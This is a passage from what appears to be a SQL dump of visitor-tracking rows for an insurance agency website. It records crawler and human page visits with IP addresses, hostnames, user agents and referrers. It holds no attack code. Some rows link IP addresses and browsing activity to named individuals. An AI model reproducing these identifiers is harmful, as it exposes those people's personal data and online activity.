x64','IE 9','','','','','','','','0','0',0),(11258,'0b_0d8f06105f2a719660140a4917b4c1bb','1459523019','184.154.139.23','placeholder.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11259,'0b_0d8f06105f2a719660140a4917b4c1bb','1459523022','184.154.139.23','placeholder.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11261,'0b_8e1760f2a8442927bb0b6d82e71f5c10','1459526353','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(11264,'0b_25dfc3e85c852905b76da6cea893a931','1459526358','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(11267,'0b_25dfc3e85c852905b76da6cea893a931','1459526365','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(11270,'0b_25dfc3e85c852905b76da6cea893a931','1459526386','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(11271,'0b_55dfd312f87b9a9bb7ebd9f3c91447bf','1459526587','66.249.75.91','crawl-66-249-75-91.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11273,'0b_55dfd312f87b9a9bb7ebd9f3c91447bf','1459526587','66.249.75.98','crawl-66-249-75-98.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11276,'0b_4d539ae647a5d9c30d323356f33e4130','1459526739','66.249.83.144,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(11277,'0b_d861dbcab5302cee0eb1c0edac420649','1459528677','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(11279,'0b_d861dbcab5302cee0eb1c0edac420649','1459528678','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(11280,'0b_d861dbcab5302cee0eb1c0edac420649','1459528681','69.164.140.246','69.164.140.246.xchangetele.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','0',0),(11282,'0b_d861dbcab5302cee0eb1c0edac420649','1459528685','69.164.140.246','69.164.140.246.xchangetele.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 43','us','1600 x 900','','','','zenwirth','','0','51',0),(11285,'0b_59345b3e6fb7be80039babce6d2db401','1459529528','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','0',0),(11286,'0b_59345b3e6fb7be80039babce6d2db401','1459529529','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','Chaim Babad','','0','0',0),(11289,'0b_b04c372bf8d99d9dd79723bfe263e545','1459529543','62.212.73.211','evo-hl21-1.gameservers.net','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(11291,'0b_b04c372bf8d99d9dd79723bfe263e545','1459529545','62.212.73.211','evo-hl21-1.gameservers.net','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(11294,'0b_b04c372bf8d99d9dd79723bfe263e545','1459529546','62.212.73.211','evo-hl21-1.gameservers.net','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(11295,'0b_b04c372bf8d99d9dd79723bfe263e545','1459529549','62.212.73.211','evo-hl21-1.gameservers.net','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(11297,'0b_3de14a164fdb8cd8ef5f7b227d5e3ac6','1459531720','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','','','','','','','0','0',0),(11298,'0b_d861dbcab5302cee0eb1c0edac420649','1459531720','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','','',0,'Win7','Chrome 43','us','','','','','zenwirth','','0','0',0),(11301,'0b_d861dbcab5302cee0eb1c0edac420649','1459531722','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 43','us','','','','','zenwirth','','0','0',0),(11304,'0b_ed8c7b180684cd002f5c485a099d3ebd','1459532462','149.202.54.34','34.ip-149-202-54.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11307,'0b_ed8c7b180684cd002f5c485a099d3ebd','1459532464','149.202.54.34','34.ip-149-202-54.eu','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11310,'0b_ed8c7b180684cd002f5c485a099d3ebd','1459532466','149.202.54.34','34.ip-149-202-54.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11313,'0b_ed8c7b180684cd002f5c485a099d3ebd','1459532468','149.202.54.34','34.ip-149-202-54.eu','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11315,'0b_347390e21142881ecb74cb54ff7a24c3','1459534243','37.145.182.142','37-145-182-142.broadband.corbina.ru','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','ru','','','','','','','0','0',0),(11318,'0b_c3f6572e6528e09655f7315dc2eb010e','1459534478','62.210.107.201','62-210-107-201.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11321,'0b_c3f6572e6528e09655f7315dc2eb010e','1459534490','62.210.107.201','62-210-107-201.rev.poneytelecom.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(11322,'0b_8e400c6c5aef40c6598c8f83c20a3e35','1459535961','12.25.107.2','12.25.107.2','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','1600 x 900','Google','','','','','0','0',0),(11325,'0b_8e400c6c5aef40c6598c8f83c20a3e35','1459535972','12.25.107.2','12.25.107.2','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(11327,'0b_2c7decce96eb4d7409aec25ae5a420cf','1459537273','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(11330,'0b_2c7decce96eb4d7409aec25ae5a420cf','1459537276','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/?p=277','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(11331,'0b_2c7decce96eb4d7409aec25ae5a420cf','1459537278','173.234.159.250','173.234.159.250.rdns.ubiquity.io','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','io','','','MJ12bot','','','','0','0',0),(11334,'0b_e914d36b8af4fbd5e92e334aaeb02dcd','1459538202','71.97.215.46','pool-71-97-215-46.sangtx.dsl-w.verizon.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1366 x 768','Google','','','','','0','0',0),(11336,'0b_e914d36b8af4fbd5e92e334aaeb02dcd','1459538204','71.97.215.46','pool-71-97-215-46.sangtx.dsl-w.verizon.net','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1366 x 768','Google','','','','','0','0',0),(11337,'0b_e914d36b8af4fbd5e92e334aaeb02dcd','1459538237','71.97.215.46','pool-71-97-215-46.sangtx.dsl-w.verizon.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 49','us','1366 x 768','Google','','','','','0','0',0),(11339,'0b_22bd404760f8cf9eec3554c276bec63d','1459538480','141.8.143.235','spider-141-8-143-235.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(11340,'0b_dd695f779561eda27a3c8f1a9b05b83c','1459539486','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11342,'0b_dd695f779561eda27a3c8f1a9b05b83c','1459540362','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11345,'0b_e356a0aad7aff74e02767b37bf125140','1459544431','157.55.39.32','msnbot-157-55-39-32.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11348,'0b_ddab6b9c52014a7a51e4d25f583968b3','1459545644','66.249.75.103','crawl-66-249-75-103.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11351,'0b_c334eeee9984c9fadd2823231f559514','1459546823','157.55.39.32','msnbot-157-55-39-32.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11352,'0b_c334eeee9984c9fadd2823231f559514','1459547132','157.55.39.32','msnbot-157-55-39-32.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11354,'0b_ed6a85c3b98439a369f87e34087c47f4','1459547867','45.79.89.188','li1188-188.members.linode.com','/','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','http://uptime.com/empireins.com','',0,'','','','','','Uptimebot','','','','0','0',0),(11355,'0b_6bf183e5e215f2b18048e0d32b8302b3','1459555305','199.30.228.131','199.30.228.131','/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.4 Safari/534.34','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(11358,'0b_6bf183e5e215f2b18048e0d32b8302b3','1459555326','199.30.228.131','199.30.228.131','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.4 Safari/534.34','http://www.empireins.com/','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(11360,'0b_445af63a6ca6634622e980f71c569770','1459557354','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11363,'0b_62154c9f6eef250d77561b63cb94fa60','1459562177','64.237.54.6','64.237.54.6.choopa.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(11366,'0b_1cd1e9c6b3ae344a5182adc41a1b745c','1459562745','123.125.71.106','baiduspider-123-125-71-106.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(11367,'0b_0d7eb4324922215fa0e7c137661c986c','1459562771','123.125.71.92','baiduspider-123-125-71-92.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(11370,'0b_0d7eb4324922215fa0e7c137661c986c','1459562849','123.125.71.13','baiduspider-123-125-71-13.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(11372,'0b_d2e2d36e079b1490496d2d199327ee35','1459564902','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11373,'0b_0645d839cb4ec5760d03978452e77661','1459564956','180.76.15.141','baiduspider-180-76-15-141.crawl.baidu.com','/insentives/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(11375,'0b_41cb3f98d6a56659eb21ea085784c957','1459567702','66.249.75.103','crawl-66-249-75-103.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11378,'0b_83b2dca51a9527b4ada5924b675cec13','1459570863','66.249.75.96','crawl-66-249-75-96.googlebot.com','/insentives/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11381,'0b_58b4a08114933177cf01422591829ad7','1459573761','188.166.13.74','188.166.13.74','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(11384,'0b_58b4a08114933177cf01422591829ad7','1459573769','188.166.13.74','188.166.13.74','/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(11387,'0b_58b4a08114933177cf01422591829ad7','1459573789','188.166.13.74','188.166.13.74','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(11390,'0b_58b4a08114933177cf01422591829ad7','1459573798','188.166.13.74','188.166.13.74','/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(11391,'0b_1681911eab6a5db5df9f0372fc8c9a5f','1459575930','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11394,'0b_350bb5b19acec35bd19263ec7129a78d','1459577164','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11397,'0b_350bb5b19acec35bd19263ec7129a78d','1459577180','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(11399,'0b_207fb6980c62ab4d81a1af981f0ab27c','1459578864','180.153.236.47','180.153.236.47','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider(compatible; HaosouSpider; http://www.haosou.com/help/help_3_2.html)','http://www.empireins.com/','',0,'Win7','','cn','','','','','','','0','0',0),(11400,'0b_9fa564e4325422428fbd9191196cb0a6','1459578989','89.163.148.58','ju058.jupiter.fastwebserver.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(11402,'0b_9fa564e4325422428fbd9191196cb0a6','1459578991','89.163.148.58','ju058.jupiter.fastwebserver.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(11405,'0b_1eb180836ed3d2bde6b7d8b309a8d589','1459581059','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11408,'0b_1be428f2bce5e02678fac1ed4c5a33d7','1459583787','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11409,'0b_6cc0c6d16627a31a4402ae0580f52328','1459583803','207.46.13.12','msnbot-207-46-13-12.search.msn.com','[404] /art/carriers2.swf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11412,'0b_d5f8ff9dab89d7d504c039fbd45ab360','1459587241','208.115.111.66','208-115-111-66-reverse.wowrack.com','/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11415,'0b_1670ef07488f6679c4746d2ed2c1eeff','1459588983','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11418,'0b_1670ef07488f6679c4746d2ed2c1eeff','1459588988','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11420,'0b_1670ef07488f6679c4746d2ed2c1eeff','1459588995','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/resources.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11421,'0b_fe9c46451e9337d242ab9e1e0932106d','1459590588','66.249.75.89','crawl-66-249-75-89.googlebot.com','/term-quotes/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(11424,'0b_3745399138155fa72e86ed369b81c3b4','1459592938','207.46.13.190','msnbot-207-46-13-190.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11426,'0b_f336b389d2ae2f8637dbcda5c23313df','1459596061','207.46.13.12','msnbot-207-46-13-12.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11427,'0b_f336b389d2ae2f8637dbcda5c23313df','1459596065','207.46.13.12','msnbot-207-46-13-12.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11430,'0b_c92b60b4b4af4202eb4ed7a36c1fa1d5','1459596860','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(11432,'0b_0babb45056cb5e08ad18c3cd0a2f3418','1459598468','207.46.13.98','msnbot-207-46-13-98.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11435,'0b_867365572c808cd0a7f31d3edc6f3b96','1459599298','85.128.142.81','akl81.rev.netart.pl','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','','',0,'WinXP','Chrome 46','pl','','','','','','','0','0',0),(11436,'0b_a79b045632b18f6da0f524950ff0c781','1459599312','178.254.0.189','sh16-63.1blu.de','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','','',0,'WinXP','Chrome 46','de','','','','','','','0','0',0),(11438,'0b_a64e06a4f5d174230f93b83c0827c89c','1459599444','5.2.147.146','sysadmins.ro','/','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','','',0,'WinXP','Chrome 46','ro','','','','','','','0','0',0),(11441,'0b_eb3cbc1cc97596b171ce5cfe33cef07b','1459600107','178.203.146.227','ip-178-203-146-227.hsi10.unitymediagroup.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(11442,'0b_eb3cbc1cc97596b171ce5cfe33cef07b','1459600109','178.203.146.227','ip-178-203-146-227.hsi10.unitymediagroup.de','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(11445,'0b_fa3e93fca198d2dd5ccefc03e034b5dc','1459600366','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11448,'0b_7443989e4526c765a842183c9d7320f7','1459601527','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11451,'0b_fa3e93fca198d2dd5ccefc03e034b5dc','1459601574','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11453,'0b_3b8f389ea1f6ab56814c5329bd5a85d8','1459602237','144.76.7.107','mj2.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(11456,'0b_3b8f389ea1f6ab56814c5329bd5a85d8','1459602239','144.76.7.107','mj2.naefmarco.ch','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(11457,'0b_3b8f389ea1f6ab56814c5329bd5a85d8','1459602241','144.76.7.107','mj2.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(11459,'0b_3b8f389ea1f6ab56814c5329bd5a85d8','1459602244','144.76.7.107','mj2.naefmarco.ch','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(11462,'0b_3b8f389ea1f6ab56814c5329bd5a85d8','1459602247','144.76.7.107','mj2.naefmarco.ch','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(11463,'0b_3b8f389ea1f6ab56814c5329bd5a85d8','1459602252','144.76.7.107','mj2.naefmarco.ch','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(11466,'0b_3b8f389ea1f6ab56814c5329bd5a85d8','1459602268','144.76.7.107','mj2.naefmarco.ch','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(11468,'0b_3b8f389ea1f6ab56814c5329bd5a85d8','1459602272','144.76.7.107','mj2.naefmarco.ch','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(11471,'0b_3b8f389ea1f6ab56814c5329bd5a85d8','1459602275','144.76.7.107','mj2.naefmarco.ch','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(11474,'0b_622b06197dd21199439cf2b3cdd2ae01','1459603436','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(11477,'0b_185e2e7232c3eeb54e098c748e8f3603','1459603436','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; 